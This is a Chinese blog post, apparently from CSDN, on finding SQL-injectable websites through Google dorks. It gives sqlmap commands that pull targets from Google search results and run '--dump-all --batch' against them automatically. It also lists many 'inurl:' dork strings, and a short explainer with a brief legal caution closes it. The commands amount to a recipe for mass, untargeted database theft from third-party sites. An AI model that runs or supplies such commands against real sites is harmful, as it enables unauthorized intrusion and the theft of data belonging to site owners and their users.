注入点之Google搜索(附关键字)


利用Google Dorks字符串找到可注入的网站

sqlmap.py -g(g即为谷歌的意思) 加上搜索引擎的语言(即google关键字)

使用示例:
1.
sqlmap.py -g "inurl:php?id="

2.
sqlmap.py -g "inurl:php?id=" --dump-all --batch

          google搜索注入点 自动跑出所有字段


部分关键字(根据自己需要的去使用):
inurl:item_id=	
inurl:review.php?id=	
inurl:hosting_info.php?id=
inurl:newsid=	
inurl:iniziativa.php?in=	
inurl:gallery.php?id=
inurl:trainers.php?id=	
inurl:curriculum.php?id=	
inurl:rub.php?idr=
inurl:news-full.php?id=	
inurl:labels.php?id=	
inurl:view_faq.php?id=
inurl:news_display.php?getid=	
inurl:story.php?id=	
inurl:artikelinfo.php?id=
inurl:index2.php?option=	
inurl:look.php?ID=	
inurl:detail.php?ID=
inurl:readnews.php?id=	
inurl:newsone.php?id=	
inurl:index.php?=
inurl:top10.php?cat=	
inurl:aboutbook.php?id=	
inurl:profile_view.php?id=
inurl:newsone.php?id=	
inurl:material.php?id=	
inurl:cat
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入是一种常见的网络安全攻击方式,利用这种漏洞,黑客可以通过在用户输入的数据中注入恶意SQL语句来达到控制或者篡改数据库的目的。而谷歌搜索SQL注入是指使用谷歌搜索引擎来查当前互联网上可能存在SQL注入漏洞的网站或者系统。下面就如何用谷歌搜索SQL注入进行简要介绍。 首先,我们可以在谷歌搜索栏中输入“SQL注入”或者“SQL注入”,然后搜索按钮。谷歌将会返回一系列相关的搜索结果。我们可以击其中任意一个结果,查看该网站是否具有SQL注入漏洞。 另外,我们还可以使用一些针对SQL注入漏洞的特定搜索语法来精确地搜索这些漏洞。例如,我们可以使用“inurl:php?id=”的搜索语法,这样谷歌就会返回具有url中包含“php?id=”的网站,其中“id=”是常见的SQL注入漏洞表现形式之一。 此外,还可以使用其他关键词,比如"SQL注入语句"、“SQL注入漏洞利用”等来搜索。通过这些关键词的组合使用,我们可以更方便地寻到存在SQL注入漏洞的网站或者系统。 在使用谷歌搜索SQL注入的过程中,我们需要注意一些道德和法律问题。首先,我们应该遵守法律法规,不得擅自利用这些漏洞进行恶意攻击或者非法活动。其次,我们应该明确自己的行为目的,如果是为了提高网络安全意识或者测试自己的网站安全性,我们需要提前取得相关授权,并在合法的范围内进行行动。 总之,通过谷歌搜索SQL注入可以帮助我们到存在SQL注入漏洞的网站或者系统,但我们必须遵守法律法规和道德规范,不能滥用这些信息来进行非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值